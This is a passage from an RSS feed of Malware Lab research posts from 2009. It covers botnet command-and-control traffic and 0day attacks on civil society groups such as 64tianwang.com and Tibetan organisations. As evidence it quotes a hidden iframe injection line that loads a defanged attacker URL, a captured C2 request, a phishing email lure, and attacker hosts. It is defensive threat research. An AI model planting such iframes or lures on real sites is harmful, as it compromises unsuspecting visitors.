<p>There was another connection of interest in our packet capture sample to “78.159.121.122” (NETDIRECT-NET, DE) which is very similar to the connection between a Storm “supernode” and a “subcontroler” as described by SecureWorks&#8217; Joe Stewart.<sup>29</sup></p>
<blockquote><p>
POST /u/ HTTP/1.0<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Internet Explorer<br />
Host: 78.159.121.122<br />
Content-Length: 712<br />
Pragma: no-cache</p>
<p>a=ZYCmeXPQwHEj9qGWsUqvzJf0nNCYaVvxlGKWOu3H4Gr[...]&#038;b=RlzWZPqmoRdB1XyjNGfn1GC3n5KdXpmROtMz33ItiXrNIJyw[...]</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 13 Oct 2009 08:30:16 GMT<br />
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch<br />
X-Powered-By: PHP/5.2.9<br />
Content-Length: 28<br />
Connection: close<br />
Content-Type: text/html</p>
<p>#���(NöÎ(5ëÊ9J#!švÝôÐpo°à¢Ëµ
</p></blockquote>
<p>According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on 78.159.121.122 appears to be Apache. </p>
<p>It is unclear if this is related to the malware &#8220;bundle&#8221; described in this post.</p>
<p><strong>Notes</strong></p>
<p>1 <a href="http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241">http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241</a></p>
<p>2 <a href="http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html">http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html</a></p>
<p>3 <a href="http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html">http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html</a></p>
<p>4 <a href="http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html">http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html</a></p>
<p>5 <a href="http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1">http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1</a></p>
<p>6 <a href="http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818">http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818</a> and <a href="http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968">http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968</a></p>
<p>7 <a href="http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf">http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf</a></p>
<p>8 <a href="http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/">http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/</a></p>
<p>9 <a href="http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt">http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt</a></p>
<p>10 <a href="http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b">http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b</a> and <a href="http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615">http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615</a></p>
<p>11 <a href="http://www.malwareurl.com/search.php?domain=&#038;s=Oficla&#038;match=0&#038;rp=50&#038;urls=on&#038;redirs=on&#038;ip=on&#038;reverse=on&#038;as=on">http://www.malwareurl.com/search.php?domain=&#038;s=Oficla&#038;match=0&#038;rp=50&#038;urls=on&#038;redirs=on&#038;ip=on&#038;reverse=on&#038;as=on</a> and <a href="http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2">http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2</a></p>
<p>12 <a href="http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com">http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com</a></p>
<p>13 <a href="http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683">http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683</a> and <a href="http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e">http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e</a></p>
<p>14 <a href="http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829">http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829</a> and <a href="http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186">http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186</a></p>
<p>15 <a href="http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491">http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491</a> and <a href="http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf">http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf</a></p>
<p>16 The IP address changed.</p>
<p>17 <a href="http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976">http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976</a> and <a href="http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115">http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115</a></p>
<p>18 <a href="http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684">http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684</a></p>
<p>19 <a href="http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745">http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745</a></p>
<p>20 <a href="http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930">http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930</a> and <a href="http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102">http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102</a></p>
<p>21 <a href="http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137">http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137</a></p>
<p>22 <a href="http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html">http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html</a> and <a href="http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html">http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html</a></p>
<p>23 http://forum.xakep.ru/m_1578962/mpage_1/key_/tm.htm#1578962 , http://74.125.95.132/search?q=cache:YeAN_Ax_3oMJ:secnull.ru/lofiversion/index.php/t2214.html+%22561194042%22&#038;cd=10&#038;hl=en&#038;ct=clnk&#038;gl=ca </p>
<p>24 <a href="http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552">http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552</a></p>
<p>25 <a href="http://www.malwaredomainlist.com/mdl.php?search=000007.ru">http://www.malwaredomainlist.com/mdl.php?search=000007.ru</a></p>
<p>26 <a href="http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com">http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com</a></p>
<p>27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “www.pay-per-install.info” as the host header the browser is redirected to www.fbi.gov.</p>
<p>28 <a href="http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/">http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ </a>and <a href="http://news.cnet.com/8301-10789_3-10040669-57.html">http://news.cnet.com/8301-10789_3-10040669-57.html</a> and <a href="https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf">https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf</a></p>
<p>29 <a href="https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf">https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf</a></p>
<p><strong>About Malware Lab</strong></p>
<p>The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks. </p>
]]></content:encoded>
			<wfw:commentRss>http://malwarelab.org/2009/11/russian-malware-bundle/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>&#8220;0day&#8221;: Civil Society and Cyber Security</title>
		<link>http://malwarelab.org/2009/10/0day-civil-society-and-cyber-security/</link>
		<comments>http://malwarelab.org/2009/10/0day-civil-society-and-cyber-security/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 13:19:17 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[Reports]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Civil Society]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Social Engineering]]></category>

		<guid isPermaLink="false">http://malwarelab.org/?p=44</guid>
		<description><![CDATA[by Nart Villeneuve &#038; Greg Walton Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks. However, civil society organizations are being compromised by attackers using &#8220;0day&#8221; exploits – vulnerabilities [...]]]></description>
			<content:encoded><![CDATA[<p>by Nart Villeneuve &#038; Greg Walton</p>
<p>Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks. </p>
<p>However, civil society organizations are being compromised by attackers using &#8220;0day&#8221; exploits – vulnerabilities for which there is no patch of &#8220;fix&#8221; available from the software vendor.  Therefore, even if all the software a civil society organization is using is completely up-to-date it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.</p>
<p>It is difficult to determine who is behind the attacks and there may be no intent to target civil society specifically. Perhaps using a human rights themed email in a social engineering attack might just be a convenient way to get peoples&#8217; attention and compromise computer systems. Moreover, it remains unclear if the attackers were able to acquire 0day exploits before they became public, or if they simply quickly leveraged after they became publicly available and before there was a vendor supplied security patch. </p>
<p>Therefore, in this post we explore cases in which there is a some form of relationship between 0day exploits and their use against civil society organizations in an effort to understand the effect of these attacks given the difficult nature of attribution. </p>
<p>In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.<sup>1</sup> The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.</p>
<p><strong>Summary</strong></p>
<ul>
<li>Civil society organizations are compromised and used as vehicles to deliver 0day exploits</li>
<li>Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available</li>
<li>Attackers leverage human rights issues as the context for malware distribution</li>
<li>The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.</li>
</ul>
<p><strong>Background</strong></p>
<p>There is a wealth of information studying 0day malware attacks emanating from locations such as Russia and China. These reports document the ability of the attackers to leverage 0day exploits in their attacks:</p>
<blockquote><p>One of the most striking features of these attacks is how quickly they adapt new exploits to their<br />
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.<sup>2</sup></p></blockquote>
<p>However, these reports do not focus on explicitly political attacks but integrate a variety of threats including fraud, acquiring gaming credentials and in general the theft of information. But the exploration of politically motivated malware attacks using 0day exploits is certainly nothing new. </p>
<p>Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.<sup>3</sup> Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.<sup>4</sup>  These attacks targeted NGO&#8217;s, the Tibetan community as well as the Falun Gong movement.  Van Horenbeeck&#8217;s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.<sup>5</sup></p>
<p>Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the &#8220;GhostNet&#8221; investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with a malware that connected back to the domain control server on 221.10.254.248 using the host name 927.bigwww.com (221.10.254.248).<sup>6</sup> On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.<sup>7</sup></p>
<p>In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as a Tibetan NGO called Drewla had bee compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including the JBIG2 buffer overflow vulnerability.<sup>8</sup> At Drewla we also found a computer connection to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck<sup>9</sup> as well as connections to religion.xicp.net which was reportedly serving a 0day in February 2009.<sup>10</sup></p>
<p><strong>Investigation</strong></p>
<p>On 2009-07-06 ISC SANS posted a list of domain that were hosting 0day Internet Explorer exploits and 64tianwang.com was on the list.<sup>11</sup> 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus widely on human rights and had to move their website overseas after it was shut down by Chinese authorities.<sup>12</sup> The organization&#8217;s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.<sup>13</sup><sup>14</sup> The  64tianwang.com has previously been a target for internet-based attacks.<sup>15</sup></p>
<p>An examination the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe was inserted into the legitimate content on the page. In fact, we have see “iframe attacks” affect a variety of organizations including the Foreign Correspondents’ Club of China (www.fccchina.org).<sup>16</sup>  Anyone visiting  64tianwang.com was loading a malicious page from rfsb.xicp.net:</p>
<blockquote><p>
document.write(&#8220;&lt;iFraMe width=&#8217;0&#8242; height=&#8217;0&#8242; src=&#8217;hxxp://rfsb.xicp.net/css/a.htm&#8217; frameborder=&#8217;0&#8242;></iFraMe>&#8220;);
</p></blockquote>
<p>The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.<sup>17</sup> Anyone visiting 64tianwang.com using Internet Explorer was likely compromised. </p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc1.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc1-300x124.png" alt="0day.doc1" title="0day.doc1" width="300" height="124" class="aligncenter size-medium wp-image-5276" /></a></p>
<p>Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers changed the directory used in the initial attack, &#8220;css&#8221;, to &#8220;cssbak&#8221; and began serving the  Microsoft Office Web Components 0day in the &#8220;css&#8221; directory instead.<sup>18</sup> Several versions of Microsoft Office were affected and anyone visiting this malicious page could be compromised even of their security updates were current.<sup>19</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc2.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc2-300x123.png" alt="0day.doc2" title="0day.doc2" width="300" height="123" class="aligncenter size-medium wp-image-5279" /></a></p>
<p>The details for the malicious website are:</p>
<blockquote><p>
Name: rfsb.xicp.net<br />
Address: 222.223.89.17<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN
</p></blockquote>
<p>Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting some phishing pages posing at login screen for a variety of Chinese or Chinese language versions of email providers including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.</p>
<p> “Phishing” is a terms that refers to the fraudulent use of legitimate looking website to entice a using in revealing sensitive information such as user names and passwords.<sup>20</sup> In this case, the attacks appear to be particularly interested in compromising users on Chinese email providers.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc3.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc3-300x152.png" alt="0day.doc3" title="0day.doc3" width="300" height="152" class="aligncenter size-medium wp-image-5280" /></a></p>
<p>If users attempt to login to their email account, the credentials are forwarded to various servers under the attackers&#8217; control:</p>
<blockquote><p>
121.22.23.254<br />
netname: UNICOM-HE<br />
descr: China Unicom Hebei province network<br />
descr: China Unicom<br />
country: CN</p>
<p>124.237.109.234<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN</p>
<p>121.22.28.29<br />
netname: QHD-YIWANGKEJI<br />
descr: CNC Group CHINA169 Hebei Province Network<br />
country: CN</p>
<p>222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN</p>
<p>my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN
</p></blockquote>
<p>The attackers use script that directs the users to a server under the control of the attacker and then redirects the user to the legitimate mail provider.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc4.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc4-300x33.png" alt="0day.doc4" title="0day.doc4" width="300" height="33" class="aligncenter size-medium wp-image-5282" /></a></p>
<p>In the case of QQ the attackers used malicious flash files that connect out to a server under the attackers control.<sup>21</sup></p>
<p>Interestingly, all the IP’s are in Hebei Province.</p>
<p>The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.<sup>22</sup> </p>
<p>Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.</p>
<p>This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.<sup>23</sup> </p>
<p>The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a &#8220;Petition for the Release of Tibetan Filmmaker Dhondup Wangchen&#8221; hosted on Facebook which is sponsored by Students for a Free Tibet. However, the email also contains a link to  hxxp://dump.vicp.cc/groups/articles.asp?n=3 which loads the real petition along with a malicious frame.</p>
<blockquote><p>
    Subject: Re: Petition for Tibetan filmmaker&#8217;s<br />
    Date: Wed, 29 Jul 2009 22:52:26 +0800<br />
    From: Tseten Samdup<br />
    To: tsetenfreetibet@gmail.com</p>
<p>    Here is the the petition lauched by SFT.</p>
<p>http://apps.facebook.com/causes/petitions/26?m=bcb306a2&#038;recruiter_id=58958974&#038;_fb_noscript=1<hxxp://dump.vicp.cc/groups/articles.asp?n=3></p>
<p>    They have already collected 27,660 signatures.<br />
    Please sign your name if you have not.</p>
<p>    Tseden Samdup</p>
<p>    > ———- Forwarded message ———-<br />
    > From: RSF ASIA<br />
    > Date: Wed, Jul 29, 2009 at 8:05 AM<br />
    > Subject: Petition for Tibetan filmmakerâ€™s<br />
    > To: tsetenfreetibet@gmail.com<br />
    ><br />
    ><br />
    > Reporters Without Borders/Reporters sans frontiÃ¨res<br />
    ><br />
    > 29 July 2009<br />
    ><br />
    > CHINA – TIBET<br />
    > More than 13,000 signatures on petition for Tibetan filmmakerâ€™s release<br />
    > http://www.rsf.org/More-than-13-000-signatures-on.html<br />
    ><br />
    > Reporters Without Borders has given the Chinese authorities a petition<br />
    > calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,<br />
    > who has been held since 23 March 2008 and is seriously ill with hepatitis B,<br />
    > which is not being properly treated. According to recent reports, he is now<br />
    > in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).<br />
    ><br />
    > At the time of his arrest, Wangchen was completing a documentary about Tibet<br />
    > that was shown to foreign journalists in Beijing during the Olympic Games.<br />
    > He may be tried on charges of “separatism”.<br />
    ><br />
    > &#8220;There is an urgent need for the competent authorities to heed the appeal<br />
    > made by thousands of citizens around the world on behalf of a man whose only<br />
    > crime was to have filmed interviews,&#8221; Reporters Without Borders said. &#8220;The<br />
    > government should take account of Dhondup Wangchen&#8217;s state of health and<br />
    > free him on humanitarian grounds.&#8221;<br />
    ><br />
    > Reporters Without Borders handed in the petition today to the Chinese<br />
    > embassy in Paris. It was signed by 13,941 people, who included Tibetans,<br />
    > Indians, westerners, and eight Australian parliamentarians. Wangchen&#8217;s wife,<br />
    > Lhamo Tso, who is a refugee in northern India, collected several thousand<br />
    > signatures with the help of the Tibet Post (www.thetibetpost.com).<br />
    ><br />
    > See Lhamo Tso&#8217;s campaign video:<br />
    > http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news<br />
    ><br />
    > Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is<br />
    > meanwhile being denied access to him. Li has allowed to see him only once<br />
    > since the start of the year in April. Like many human rights lawyers in<br />
    > China, he is being harassed by the government, which is threatening to<br />
    > rescind his licence if he does not drop the case.<br />
    > Vincent Brossel<br />
    > Asia-Pacific Desk<br />
    > Reporters Without Borders<br />
    > 33 1 44 83 84 70<br />
    > asia@rsf.org
</p></blockquote>
<p>The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.<sup>24</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc5.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc5-300x66.png" alt="0day.doc5" title="0day.doc5" width="300" height="66" class="aligncenter size-medium wp-image-5283" /></a></p>
<p>This page loads &#8220;xp.swf&#8221; and drops &#8220;zjss.exe&#8221; onto the system which attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (there is not currently anything running on 8080). (This same domain was used in a 2006 0day for Japanese word processing software).<sup>25</sup></p>
<p>Also hosted in this sites is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film &#8220;Leaving Fear Behind.&#8221; Dhondup Wangchen is director of the film.</p>
<p>In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.</p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc6.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc6-300x49.png" alt="0day.doc6" title="0day.doc6" width="300" height="49" class="aligncenter size-medium wp-image-5284" /></a></p>
<p>The IP address for dump.vicp.cc 210.56.60.132 which is assigned to:</p>
<blockquote><p>
netname: SUN-NETWORK<br />
descr: Sun Network (Hong Kong) Limited<br />
descr: Internet Service Provider in Hong Kong<br />
country: HK
</p></blockquote>
<p>Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis. </p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc7.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc7-300x45.png" alt="0day.doc7" title="0day.doc7" width="300" height="45" class="aligncenter size-medium wp-image-5285" /></a></p>
<p>In addition to an email that was released by Reporters Without Borders (RSF) a web page was also setup on the RSF web site that highlighted the fact that more than 13,000 people signed a petition to release  Dhondup Wangchen. However, the page on the RSF web site contained the same link from the malicious email that included both the legitimate Facebook petition by Students for a Free Tibet as well as the malicious link to dump.vicp.cc.<sup>26</sup></p>
<p><a href="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc8.png"><img src="http://malwarelab.org/wp-content/uploads/2009/10/0day.doc8-300x94.png" alt="0day.doc8" title="0day.doc8" width="300" height="94" class="aligncenter size-medium wp-image-5286" /></a></p>
<p>RSF promptly removed the malicious link after being alerted.</p>
<p><strong>Conclusion</strong></p>
<p>Our findings indicate that civil society organizations are compromised and used as  vehicles to deliver 0day exploits to others (e.g. via malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site &#8211; many of whom may be staff and supporters of the specific organization &#8211; are likely to be compromised.</p>
<p>We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.</p>
<p>The attackers leverage human rights issues as the context for malware distribution in what are commonly called &#8220;social engineering&#8221; attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website. </p>
<p>These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.</p>
<p>However, the murky questions of intent of the attackers as well responsibility for the attacks remain unclear. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used just like any other random target as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights themed email to in a social engineering attack might just be a convenient way to get peoples&#8217; attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might more easily enticed to click on such a link. </p>
<p>An alternative explanation is that attackers are intent on targeting civil society and are developing and/or have access to 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society and we are noticing an increasing level of contextual relevance in these attacks.  Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contain less spelling and grammatical errors and exploit legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks actually may limit the total number of hosts but provide the attackers with politically sensitive hosts.</p>
<p>While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.</p>
<p><strong>About IWM</strong></p>
<p>The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in a Ottawa (Canada).</p>
<p><strong>About Malware Lab</strong></p>
<p>The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks. </p>
<p><strong>Notes</strong></p>
<p>1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.</p>
<p>2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf</p>
<p>3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf</p>
<p>4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf</p>
<p>5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf</p>
<p>6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network</p>
<p>7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210</p>
<p>8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219</p>
<p>9 http://isc.sans.org/diary.html?storyid=4177</p>
<p>10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0</p>
<p>11 http://isc.sans.org/diary.html?storyid=6739&#038;rss</p>
<p>12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&#038;emc=th&#038;pagewanted=all</p>
